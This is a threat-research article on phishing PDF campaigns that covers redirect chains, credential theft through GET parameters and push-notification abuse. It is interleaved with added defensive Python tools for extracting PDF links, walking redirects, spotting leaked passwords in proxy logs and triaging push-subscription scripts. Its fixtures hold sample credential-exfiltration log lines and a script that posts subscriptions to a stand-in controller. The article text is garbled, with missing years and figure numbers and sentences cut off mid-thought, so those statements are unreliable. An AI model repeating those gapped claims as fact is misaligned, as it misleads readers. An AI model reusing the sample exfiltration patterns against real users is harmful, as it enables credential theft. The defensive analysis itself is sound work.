Why phishing works .pdf
In , we observed more than 5 million malicious PDF files. Table 1 shows the increase in the percentage of malicious PDF files we observed in compared to .

Table 1. Distribution of malicious PDF samples in and .

The pie chart in Figure 1 gives an overview of how each of the top trends and schemes was distributed. In the following sections, we go over each scheme in detail. After studying different malicious PDF campaigns, we found one technique in use across the majority of them: traffic redirection.
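Since every campaign discussed here starts from a link embedded in the PDF, the first thing an analyst wants is a way to pull those link targets out of a file without rendering it. The Python script below is an added example written for this page, not code from the original article. It scans the raw file for `/URI` entries (literal and hex string forms) and also inflates any zlib-compressed streams it can, because annotations stored inside FlateDecode object streams are invisible to a plain grep. The sample PDF it builds is constructed for the demonstration and uses reserved `.test` domains.

```python
import re
import zlib

# /URI followed by a PDF literal string "( ... )" (handles escaped parens) ...
URI_LITERAL_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
# ... or by a PDF hex string "< ... >".
URI_HEX_RE = re.compile(rb"/URI\s*<([0-9A-Fa-f\s]*)>")
# Raw stream bodies; we try to inflate each one (FlateDecode is the usual filter).
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def _unescape(literal: bytes) -> str:
    # Simplified PDF literal-string unescaping: "\x" -> "x" (octal escapes ignored).
    return re.sub(rb"\\(.)", lambda m: m.group(1), literal).decode("latin-1")


def extract_uris(pdf_bytes: bytes) -> list:
    """Return distinct /URI targets in order of first appearance.

    Scans the raw file, then every stream it can zlib-inflate, so link
    annotations packed into compressed object streams are found too.
    """
    found, seen = [], set()

    def scan(blob: bytes) -> None:
        for m in URI_LITERAL_RE.finditer(blob):
            uri = _unescape(m.group(1))
            if uri not in seen:
                seen.add(uri)
                found.append(uri)
        for m in URI_HEX_RE.finditer(blob):
            uri = bytes.fromhex(m.group(1).decode("ascii")).decode("latin-1")
            if uri not in seen:
                seen.add(uri)
                found.append(uri)

    scan(pdf_bytes)
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            scan(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-encoded (image, font, ...) or truncated
    return found


def build_sample_pdf() -> bytes:
    """Constructed sample, not a real phishing file: one plain /Link annotation
    plus one annotation hidden in a Flate-compressed stream (schematic ObjStm)."""
    hidden = (b"<< /Type /Annot /Subtype /Link /A << /S /URI "
              b"/URI (http://track.example.test/r?x=1) >> >>")
    packed = zlib.compress(hidden)
    return b"\n".join([
        b"%PDF-1.4",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj",
        b"4 0 obj << /Type /Annot /Subtype /Link /Rect [100 100 300 150]"
        b" /A << /S /URI /URI (http://gate.example.test/go?id=1) >> >> endobj",
        b"5 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
        + str(len(packed)).encode() + b" >>",
        b"stream",
        packed,
        b"endstream",
        b"endobj",
        b"trailer << /Root 1 0 R >>",
        b"%%EOF",
    ])


if __name__ == "__main__":
    for uri in extract_uris(build_sample_pdf()):
        print(uri)
```

The extracted targets are what the next step (following the redirect chain) starts from; a full tool would also handle other stream filters and `/Launch` or `/JavaScript` actions, which this example leaves out.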

Before we review the different PDF phishing campaigns, we will discuss the importance of traffic redirection in malicious and phishing PDF files. The links embedded in phishing PDF files often take the user to a gating website, from which they are redirected either to a single malicious website or to several of them in sequence. By embedding a link to a gating site instead of to the final phishing website, which is subject to frequent takedowns, the attacker extends the shelf life of the phishing PDF lure and also evades detection.

Additionally, the final objective of the lure can be changed as needed e. We identified the top five phishing schemes from our dataset and will break them down in the order of their distribution.

It is important to keep in mind that phishing PDF files often act as a secondary step and work in conjunction with their carrier e.

The second category we identified was coupon-themed phishing PDF files, which often used the logo of a prominent oil company. Figure 3 shows an example of this type of phishing PDF file.

Similar to other campaigns we observed, these phishing files also leveraged traffic redirection for reasons mentioned previously. Upon analyzing several of them, we found out that they use two traffic redirectors.

Figure 4 shows the chain for a sample SHA b7e09ba90eea66a5c3cfbdeddeabe. The gating website took us to another website track[. All of these redirections happened through HTTP response messages.

These phishing files do not necessarily carry a specific message, as they are mostly static images with a picture of a play button embedded in them. Although we observed several categories of images, a significant portion either used nudity or followed specific monetary themes such as Bitcoin, stock charts and the like to lure users into clicking the play button.

Figure 6 shows a PDF file with a Bitcoin logo and a clickable play button. Upon clicking the play button, we were again, as expected, redirected to another website. From the domain name, one could assume the website is also within the realm of online dating. However, at the time of this writing, this website had been taken down. Unlike the previous campaign, there was only one redirector involved, and we noticed that all the redirectors had the format of: 6-digit-alphanumeric-unique-id[dot]sed followed by a main domain as listed below.
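To document a chain like the one in Figure 4 hop by hop, the analysis tool must not let the HTTP client follow redirects on its own, or the gating sites in the middle drop out of the record. The Python example below is added here and is not part of the original article. It walks a chain one response at a time, resolves relative `Location` headers, stops on loops or after a hop limit, and flags hostnames that match an assumed reading of the redirector naming pattern described above (`<6 alphanumerics>.sed.<domain>`, my interpretation of the text, adjust if the real pattern differs). The responses it walks are constructed in-memory stand-ins on `.test` domains; `http_fetch` is the live variant, meant to run only inside an isolated analysis environment.

```python
import re
from urllib.parse import urljoin, urlsplit

# Assumed interpretation of "6-digit-alphanumeric-unique-id[dot]sed followed by
# a main domain": <6 alphanumerics>.sed.<registrable domain>.
REDIRECTOR_HOST_RE = re.compile(r"^[a-z0-9]{6}\.sed\.[a-z0-9.-]+\.[a-z]{2,}$", re.I)


def walk_redirects(start_url, fetch, max_hops=10):
    """Follow HTTP redirects one hop at a time and record every hop.

    `fetch(url)` must return (status_code, headers_dict) WITHOUT following
    redirects itself. Stops on a non-3xx response, a missing Location header,
    a revisited URL (loop) or after max_hops redirects.
    """
    hops, seen, url = [], set(), start_url
    for _ in range(max_hops + 1):
        if url in seen:
            hops.append({"url": url, "status": None, "note": "loop"})
            break
        seen.add(url)
        status, headers = fetch(url)
        host = urlsplit(url).hostname or ""
        hops.append({"url": url, "status": status,
                     "redirector_like": bool(REDIRECTOR_HOST_RE.match(host))})
        location = headers.get("Location") or headers.get("location")
        if 300 <= status < 400 and location:
            url = urljoin(url, location)  # Location may be relative
            continue
        break
    else:
        hops.append({"url": url, "status": None, "note": "max_hops exceeded"})
    return hops


def http_fetch(url, timeout=10):
    """Live fetch with automatic redirect following disabled (sandbox use only)."""
    import urllib.error
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # refuse to follow; caller records the hop instead

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as e:  # 3xx surfaces here when not followed
        return e.code, dict(e.headers)


# Constructed responses standing in for a live chain; nothing is fetched.
FAKE_RESPONSES = {
    "http://lure.example.test/offer": (302, {"Location": "http://ab12cd.sed.example.test/go"}),
    "http://ab12cd.sed.example.test/go": (302, {"Location": "/step2"}),
    "http://ab12cd.sed.example.test/step2": (302, {"Location": "http://track.example.test/r?u=1"}),
    "http://track.example.test/r?u=1": (303, {"Location": "https://final.example.test/login"}),
    "https://final.example.test/login": (200, {"Content-Type": "text/html"}),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, {}))


if __name__ == "__main__":
    for hop in walk_redirects("http://lure.example.test/offer", fake_fetch):
        print(hop)
```

Keeping each intermediate hostname (and marking the ones that look like disposable redirectors) gives blocklist and takedown work something more durable to act on than the final landing page, which, as the text notes, changes from visit to visit.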

They often inform the user that someone has shared a document with them. However, due to reasons which can vary from one PDF file to another, the user cannot see the content and apparently needs to click on an embedded button or a link. Figure 7 shows a PDF with a Dropbox logo asking the user to click on the button to request access. As the number of cloud-based file sharing services increases, it would not be surprising to see this theme surge and continue to be among the most popular approaches.

We were given two options for signing in: a Microsoft email account or another email service. Atlassian Stack is geared towards enterprises, so we assume this campaign was targeting enterprise users. Each of those links was designed to look like a legitimate email sign-on page. After we entered a fake email address, we proceeded to another page that asked us to enter our password, as shown in Figure . We observed that the stolen credentials were sent to the attacker's server through the parameters of a GET request, as shown in Figure . After entering the test credentials, we were taken back to the first login page.
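Credentials carried in GET query parameters, as observed in this campaign, end up in proxy and web server logs, which makes them detectable after the fact. The Python detector below is an added example, not code from the original article: it parses constructed proxy log lines (timestamp, client, method, URL, status), flags GET requests whose query string contains a password-class parameter name, and reports only the parameter names and destination host, never the values, so the alert does not spread the credential further. The parameter-name lists are heuristics I chose for the example and should be tuned to the environment.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Heuristic parameter names (my choice for this example, extend as needed).
SECRET_RE = re.compile(r"^(pass(word|wd|w|code)?|pwd|pw|secret|pin|otp)$", re.I)
IDENTITY_RE = re.compile(r"^(user(name|id)?|login|email|e-?mail|mail|account)$", re.I)

# Constructed proxy log lines: timestamp client method url status.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 GET http://cdn.example.test/app.js 200
2024-01-01T10:00:02Z 10.0.0.5 GET http://login.example.test/next.php?email=alice%40corp.example&pass=Winter2024%21 302
2024-01-01T10:00:03Z 10.0.0.7 GET http://search.example.test/?q=password+policy 200
2024-01-01T10:00:04Z 10.0.0.9 GET http://collect.example.test/a.php?user=bob&pwd=hunter2&r=1 200
2024-01-01T10:00:05Z 10.0.0.9 GET http://profile.example.test/view?user=bob 200
"""


def find_credential_leaks(log_text):
    """Flag GET requests whose query string carries a password-class parameter.

    Returns one tuple per hit: (timestamp, client, destination host, parameter
    names). A lone identity parameter (user=bob) is not flagged, since that is
    common in benign traffic; a password-class name is required.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[2] != "GET":
            continue
        ts, client, _, url, _ = parts[:5]
        parsed = urlsplit(url)
        names = [k for k, _ in parse_qsl(parsed.query, keep_blank_values=True)
                 if SECRET_RE.match(k) or IDENTITY_RE.match(k)]
        if any(SECRET_RE.match(k) for k in names):
            hits.append((ts, client, parsed.hostname, names))
    return hits


if __name__ == "__main__":
    for hit in find_credential_leaks(SAMPLE_LOG):
        print(hit)
```

The same check is worth running over HTTP request logs from the web tier and over URL fields in email security telemetry, and a hit should trigger a credential reset for the source user rather than just a block of the destination.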

We would like to note that, at the time we visited this website, it was already flagged as phishing by major browsers such as Google Chrome and Mozilla Firefox. However, we clicked through the warning page to investigate further.

Incorporating e-commerce themes into phishing emails and documents is not a new trend. However, we observed an upward trend in the number of fraudulent PDF files that used common e-commerce brands to trick users into clicking on embedded links. Figure 14, similarly, shows a PDF file telling the user that their Apple ID account will be suspended if they do not click on the link to update their information.

At the time of this writing, all the websites for this specific campaign had been taken down. Examples include:

As mentioned earlier, traffic redirection websites do not point to a fixed website; they often redirect the user to a different website on each visit. To understand the whole chain, we followed the link from Figure . The response was multi-function JavaScript code, which can be seen in Figure . Essentially, this code registers a browser push notification, as shown in Figure . When the user agrees and subscribes to the push notification, the function SubS from Figure 17 is called, which sends a POST request to let the controller know that the user has subscribed.

Figure 19 shows the specific POST request. This loop can repeat a few times. It is important to note that the site does not have to be open in the browser for the notifications to appear. After completing the chain, we noticed that two push notifications had been registered in our browser, as shown in Figure . At the end, we landed on an online gaming website. As we can see, there are a lot of parameters involved in the above GET request.

These identifiers tell the owner of the website how the user got there. It is our assumption that this is how the attackers generate revenue.
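The push-notification stage described above leaves a recognisable footprint in the script the redirector serves: a service worker registration, a permission prompt, a `pushManager.subscribe` call and a POST that hands the subscription to a controller. The Python triage helper below is an added example, not code from the original article or the campaign; it scans a script for those indicators and extracts the endpoints that receive POSTs, which is what an analyst needs to block the controller and to explain why notifications keep arriving after the tab is closed. The sample script is constructed for the demonstration and stands in for the real JavaScript; the browser APIs it names (`serviceWorker.register`, `Notification.requestPermission`, `pushManager.subscribe`) are standard web platform calls.

```python
import re

# Constructed stand-in for the redirector's script (not the campaign's code).
SAMPLE_JS = """
navigator.serviceWorker.register('/sw.js').then(function (reg) {
  Notification.requestPermission().then(function (perm) {
    if (perm !== 'granted') { location.href = 'https://next.example.test/'; return; }
    reg.pushManager.subscribe({ userVisibleOnly: true, applicationServerKey: key })
      .then(function (sub) {
        fetch('https://ctl.example.test/subs', { method: 'POST', body: JSON.stringify(sub) });
        var x = new XMLHttpRequest();
        x.open('POST', 'https://ctl.example.test/ping');
        x.send('ok=1');
      });
  });
});
"""

# Each stage of a browser push-subscription flow, as a regex over the script.
PUSH_INDICATORS = {
    "service_worker_register": re.compile(r"serviceWorker\s*\.\s*register\s*\("),
    "notification_permission": re.compile(r"Notification\s*\.\s*requestPermission\s*\("),
    "push_subscribe": re.compile(r"pushManager\s*\.\s*subscribe\s*\("),
}
# POST destinations via fetch(url, {method: 'POST'}) and XMLHttpRequest.open('POST', url).
FETCH_POST_RE = re.compile(
    r"""fetch\(\s*['"]([^'"]+)['"]\s*,\s*\{[^}]*?method\s*:\s*['"]POST['"]""", re.I | re.S)
XHR_POST_RE = re.compile(r"""\.open\(\s*['"]POST['"]\s*,\s*['"]([^'"]+)['"]""", re.I)


def triage_push_script(js):
    """Report which push-subscription stages a script contains and where it POSTs.

    `push_subscription_flow` is True only when the script both asks for
    notification permission and subscribes to push, the combination that lets
    a site keep delivering notifications after its tab is closed.
    """
    indicators = [name for name, rx in PUSH_INDICATORS.items() if rx.search(js)]
    endpoints = FETCH_POST_RE.findall(js) + XHR_POST_RE.findall(js)
    return {
        "indicators": indicators,
        "post_endpoints": sorted(set(endpoints)),
        "push_subscription_flow": {"notification_permission", "push_subscribe"} <= set(indicators),
    }


if __name__ == "__main__":
    print(triage_push_script(SAMPLE_JS))
```

Minified or obfuscated scripts will defeat these plain regexes; in that case the same indicators can be collected from the browser's DevTools or from the sandbox's network log, where the POST to the controller shows up regardless of how the script was written. On an affected machine, revoking the site's notification permission is what stops the notifications.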


